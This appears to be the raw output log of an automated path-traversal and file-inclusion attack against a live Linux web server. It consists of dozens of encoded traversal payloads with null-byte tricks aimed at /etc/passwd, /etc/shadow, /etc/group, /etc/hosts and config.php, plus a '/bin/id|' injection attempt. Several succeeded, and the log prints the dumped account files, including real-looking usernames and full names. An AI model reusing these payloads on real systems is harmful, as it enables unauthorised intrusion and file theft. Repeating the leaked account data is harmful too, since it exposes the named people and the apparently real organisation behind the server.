- mem:x:8:
- kmem:x:9:
- wheel:x:10:root
- mail:x:12:mail,postfix
- uucp:x:14:uucp
- man:x:15:
- games:x:20:
- gopher:x:30:
- video:x:39:
- dip:x:40:
- ftp:x:50:
- lock:x:54:
- audio:x:63:
- nobody:x:99:
- users:x:100:
- dbus:x:81:
- utmp:x:22:
- utempter:x:35:
- floppy:x:19:
- vcsa:x:69:
- rpc:x:32:
- abrt:x:499:
- cdrom:x:11:
- tape:x:33:
- dialout:x:18:
- saslauth:x:498:
- mailnull:x:47:
- smmsp:x:51:
- haldaemon:x:68:haldaemon
- ntp:x:38:
- rpcuser:x:29:
- nfsnobody:x:65534:
- apache:x:48:
- webalizer:x:67:
- sshd:x:74:
- postdrop:x:90:
- postfix:x:89:
- tcpdump:x:72:
- slocate:x:21:
- stapdev:x:497:
- stapusr:x:496:
- sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
- cmccan:x:500:
- darnold:x:501:
- kmars:x:503:
- mstrydom:x:533:
- zabbix:x:309:
- clamav:x:311:
- clamupdate:x:312:
- clam:x:308:
- cgred:x:307:
- ahps:x:303:
- nwschat:x:320:
- forecast:x:302:
- ndfd:x:306:
- nscanner:x:424:
- memcached:x:301:
- stapsys:x:157:
- <b>Query Used: ///////etc//passwd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /'%00</b>.<b>Query Used: /\,%ENV\,/%00</b>.<b>Query Used: /etc/passwd%00</b>.<b>Query Used: /etc/passwd%00</b>.<b>Query Used: /.....%0a%00</b>.<b>Query Used: /%2A%00</b>.<b>Query Used: /etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:302:302:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: ..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd%00</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /etc/passwd^^%00</b>.<b>Query Used: /etc/group%00</b>root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- disk:x:6:root
- lp:x:7:daemon,lp
- mem:x:8:
- kmem:x:9:
- wheel:x:10:root
- mail:x:12:mail,postfix
- uucp:x:14:uucp
- man:x:15:
- games:x:20:
- gopher:x:30:
- video:x:39:
- dip:x:40:
- ftp:x:50:
- lock:x:54:
- audio:x:63:
- nobody:x:99:
- users:x:100:
- dbus:x:81:
- utmp:x:22:
- utempter:x:35:
- floppy:x:19:
- vcsa:x:69:
- rpc:x:32:
- abrt:x:499:
- cdrom:x:11:
- tape:x:33:
- dialout:x:18:
- saslauth:x:498:
- mailnull:x:47:
- smmsp:x:51:
- haldaemon:x:68:haldaemon
- ntp:x:38:
- rpcuser:x:29:
- nfsnobody:x:65534:
- apache:x:48:
- webalizer:x:67:
- sshd:x:74:
- postdrop:x:90:
- postfix:x:89:
- tcpdump:x:72:
- slocate:x:21:
- stapdev:x:497:
- stapusr:x:496:
- sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
- cmccan:x:500:
- darnold:x:501:
- kmars:x:503:
- mstrydom:x:533:
- zabbix:x:309:
- clamav:x:311:
- clamupdate:x:312:
- clam:x:308:
- cgred:x:307:
- ahps:x:303:
- nscanner:x:424:
- memcached:x:302:
- stapsys:x:157:
- <b>Query Used: \\\\\\\etc/\passwd%00</b>.<b>Query Used: /etc/shadow^^%00</b>.<b>Query Used: /bin/id|%00</b>.<b>Query Used: ././././././etc//passwd%00</b>.<b>Query Used: /..\..\..\..\..\..\etc/passwd%00</b>.<b>Query Used: /..\..\..\..\..\..\etc/shadow%00</b>.<b>Query Used: \.\.\.\.\.\.\etc/\passwd%00</b>.<b>Query Used: /./././././././././././etc/passwd%00</b>.<b>Query Used: /./././././././././././etc/shadow%00</b>.<b>Query Used: /./././././././././././etc/group%00</b>.<b>Query Used: ......etc/passwd%00</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\passwd%00</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\group%00</b>.<b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00</b><b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00</b><b>Query Used: /%00//%00//%00//%00//%00//etc//shadow%00</b><b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/passwd%00</b>.<b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/shadow%00</b>.<b>Query Used: ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63%00</b>.<b>Query Used: ..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63passwd%00</b>.<b>Query Used: ..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qf%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfpasswd%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfgroup%00</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc/passwd%00</b>.<b>Query Used: \.\.\.\.\.\.etc/passwd%00</b>.<b>Query Used: etc/passwd%00</b>.<b>Query Used: etc/shadow%00</b>.<b>Query Used: %00</b>.<b>Query Used: %00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215shadow%00</b>.<b>Query Used: .%5c..%5c/..%c0%9v..%5c.%5c..%5c/..%c0%9v%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group%00</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00</b>.<b>Query Used: ..%255c%00</b>.<b>Query Used: .%5c..%5c%00</b>.<b>Query Used: /..%c0%9v%00</b>.<b>Query Used: /%00</b>.<b>Query Used: /..%255c..%255c%00</b>.<b>Query Used: ///%00</b>.<b>Query Used: /..%255c..%255c/..%255c..%255c/..%255c..%255c%00</b>.<b>Query Used: ..%255c%00</b>.<b>Query Used: .%5c..%5c/..%c0%9v%00</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd%00</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216hosts%00</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216shadow%00</b>.<b>Query Used: ./\./\./\./\./\./\./etc/hosts%00</b>.<b>Query Used: \./\./\./\./\./\./\etc/\passwd%00</b>.<b>Query Used: \./\./\./\./\./\./\proc/\self/d/%00</b>.<b>Query Used: /////config.php%00</b>.<b>Query Used: ..\/..\/..\/..\/config.php%00</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php%00</b>.<b>Query Used: config.php%00</b>.<b>Query Used: ..%25%35%63..%25%35%63..%25%35%63config.php%00</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2econfig.php%00</b>.<b>Query Used: %00.php</b><b>Query Used: etc/hosts%00.php</b>127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
- ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
- <b>Query Used: etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
- darnold:x:501:501:darnold:/home/darnold:/bin/bash
- kmars:x:503:503:kmars:/home/kmars:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: ..\%20\..\%20\..\%20\etc/passwd%00.php</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\passwd%00.php</b>.<b>Query Used: ../../../../../../../../../../etc/passwd%00.php</b>.<b>Query Used: ../../../../../../../../../../etc/hosts%00.php</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\group%00.php</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/passwd%00.php</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/shadow%00.php</b>.<b>Query Used: /%00.php</b><b>Query Used: %00/%00.php</b><b>Query Used: /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00.php</b>.<b>Query Used: %2A%00.php</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
- abrt:x:499:499::/etc/abrt:/sbin/nologin
- saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- tcpdump:x:72:72::/:/sbin/nologin
- cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
- darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
- kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
- mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
- zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
- clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
- clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
- clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
- ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
- nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
- forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
- ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
- nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
- memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
- <b>Query Used: /////etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
